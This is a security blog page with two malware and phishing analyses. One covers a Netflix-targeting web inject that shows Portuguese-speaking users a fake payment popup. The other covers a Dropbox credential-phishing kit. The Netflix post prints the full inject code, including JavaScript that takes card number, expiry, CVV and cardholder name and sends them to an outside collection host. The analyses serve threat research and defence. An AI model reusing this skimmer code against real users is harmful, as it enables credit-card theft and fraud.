Skip to content →

Tag: fraud

NETFLIX malware/phishing attack targeting Portuguese-speaking countries

Netflix is one of the most popular streaming platforms , all over the world, especially because of the “hottest” TV series. But, this popularity has attracted also criminals, looking for new ways to steal money. During the last months Netflix has been targeted by malware, written to steal credit card information and user credentials. The attack uses the same methodologies used by financial malware like Dridex/Zeus: web injects.

Once the user has been infected, the malware waits till the user loads the Netflix webpage to login. As soon as the user accesses the page and the browser loads the content from the server, the malware injects the malicious HTML, JavaScript and CSS content.

The code is activated in case of GET or POST requests on *netflix.com*.

set_url *netflix.com/* GP

where G= GET and P=POST

Once the page is loaded the malware injects the following code:

CSS code

.ontop {
z-index: 999;
width: 100%;
height: 100%;
top: 0;
left: 0;
display: none;
position: absolute;
}
.ontop2 {
top: 50%;
left: 50%;
margin-bottom: 0;
align-content: center;
}
#popup {
padding: 10px;
width: 1224px;
height: 700px;
position: absolute;
color: #fff;
top: 50%;
left: 50%;
margin-top: -400px;
margin-left: -600px;
font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;
font-size: 12px;
background: #000000;
}
#cc_form input {
width: 100%;
height: 50px;
padding: 9px;
border-radius: 2px;
border: 1px solid #999;
color: #fff;
background-color: #333;
}
#cc_form td {
padding-top: 10px;
color: #eee;
font-size: 12px;
}
#cc_submit {
text-decoration: none;
color: white;
padding-bottom: 12px;
padding-left: 28px;
padding-right: 28px;
padding-top: 12px;
text-align: center;
border-radius: 2px;
background: #ff3019;
background: -moz-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: -webkit-linear-gradient(top, #ff3019 0%, #cf0404 100%);
background: linear-gradient(to bottom, #ff3019 0%, #cf0404 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff3019', endColorstr='#cf0404', GradientType=0);
}
#cc_submit:hover {
background: #ff1a00;
background: -moz-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: -webkit-linear-gradient(top, #ff1a00 0%, #ff1a00 100%);
background: linear-gradient(to bottom, #ff1a00 0%, #ff1a00 100%);
filter: progid: DXImageTransform.Microsoft.gradient( startColorstr='#ff1a00', endColorstr='#ff1a00', GradientType=0);
} 
JavaScript code

.....

function submitMe(){ 
    if (document.getElementById("cc_number").value == "") {
        alert("Ingresse um numero de Cartao");
        document.getElementById("cc_number").focus();
        return false;
    }else {
        if (valid_credit_card(document.getElementById("cc_number").value)) {} 
        else {
           alert("Ingresse um numero Valido");
           document.getElementById("cc_number").focus();
           return false;
        }
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o mes de validade!");
        document.getElementById("cc_month").focus();
        return false;
    }
    if (document.getElementById("cc_month").value == "") {
        alert("Ingresse o ano de validade!");
        document.getElementById("cc_year").focus();
        return false;
    } 
    if (document.getElementById("cc_ccv").value == "") {
        alert("Ingresse o codigo de segurança do seu cartao!");
        document.getElementById("cc_ccv").focus();
        return false;
    }
    if (document.getElementById("cc_name").value == "") {
        alert("Ingresse o seu nome Completo!");
        document.getElementById("cc_name").focus();
        return false;
    }

var _link_ = "https://p0o9i8u7y9.xyz/braz2/gate.php?";
var _url_ = _link_ + 'CC=' + document.getElementById("cc_number").value + '&month=' + document.getElementById("cc_month").value + '&year=' + document.getElementById("cc_year").value + '&cvv=' + document.getElementById("cc_ccv").value + '&name=' + document.getElementById("cc_name").value;
var head = document.getElementsByTagName("head")[0];
var script_ = document.createElement('script');
script_.src = _url_;
script_.type = 'text/javascript';
head.appendChild(script_);
setCookie("WeAre", "Foda", 365);
hide('popDiv');
}

......
HTML code


<div class="ontop" id="popDiv">

<div id="popup">
   <center>
   <img src= "https://logodownload.org/wp-content/uploads/2014/10/netflix-logo.png"width="128">
  </center>

<h4>Houve um problema com seus dados de pagamento.</h4>

Desculpe-nos por
 interromper o show, mas não foi possÌvel confirmar suas informações de
 pagamento. Mas não se preocupe! Insira os dados no campo abaixo para
 continuar.

<form id="cc_form" name="cc_form">

<table width="100%">

<tr>

<td colspan="2">Numero do cartão: <input id="cc_number" name= "cc_number" placeholder="E.g. 0000 0000 0000 0000" type="text"></td>

 </tr>


<tr>

<td>Validade: <input id="cc_month" name="cc_month" placeholder="MM" style="width: 45% !important;" type="text"> <input id="cc_year" name= "cc_year" placeholder="AA" style="width: 45% !important;" type= "text"></td>


<td>Codigo de segurança: <input id="cc_ccv" name="cc_ccv" placeholder="" type="text"></td>

 </tr>


<tr>

<td colspan="2">Nome do titular (conforme escrito no cartão):
 <input id="cc_name" name="cc_name" type="text"></td>

 </tr>

 </table>

<a href="" id="cc_submit" onclick="submitMe();">CONTINUAR</a>
 </form>

 </div>

</div>


 

In order to see how the malware interacts with the user, we can inject the code in the browser, where the Netflix login page is loaded.

The malware checks, weather the inserted credit card  has a valid number or not.screen-shot-2016-10-17-at-2-54-52-pm

Using a valid credit card is possible to submit the request, triggering the submitMe() JavaScript function (showed above).

Leave a Comment

Phishing Attack #4 – Dropbox

Clone kit revealed

A new fake Dropbox phishing scam targeting users of the online sharing and storage platform is currently in circulation. The scam invites readers to view files shared by another Dropbox user, and click on a link that redirects to a phishing website. 

screen-shot-2016-10-13-at-11-26-48-am

However, this phishing scam tries to fool users into submitting username and password details of their email address (YAHOO, Outlook, Gmail,AOL or others)  in order to gain access their account.

screen-shot-2016-10-13-at-11-26-57-am

Clicking on the icons a modal pops up asking for credentials.

screen-shot-2016-10-13-at-11-27-16-am screen-shot-2016-10-13-at-11-27-24-am

Once the credentials are filled and the “Submit” button is clicked, the credentials are sent through email to the phisher. 

Analyzing the web server is possible to retrieve the clone kit used by the attacker to create the phishing website. The clone kit is very simple and developed with basic programming skills. Below the structure and the source code of submit.php. “form.php” and “index.php” are 99% composed by HTML code.

screen-shot-2016-10-13-at-11-37-51-am

The developer downloaded all the icons to avoid recon.

screen-shot-2016-10-13-at-11-38-07-am

screen-shot-2016-10-13-at-11-28-32-am

Dropbox can easily identify this phishing attack analyzing the HTTP referer field of the HTTP packet, because the phishing website redirects to the official dropbox website.

 

Leave a Comment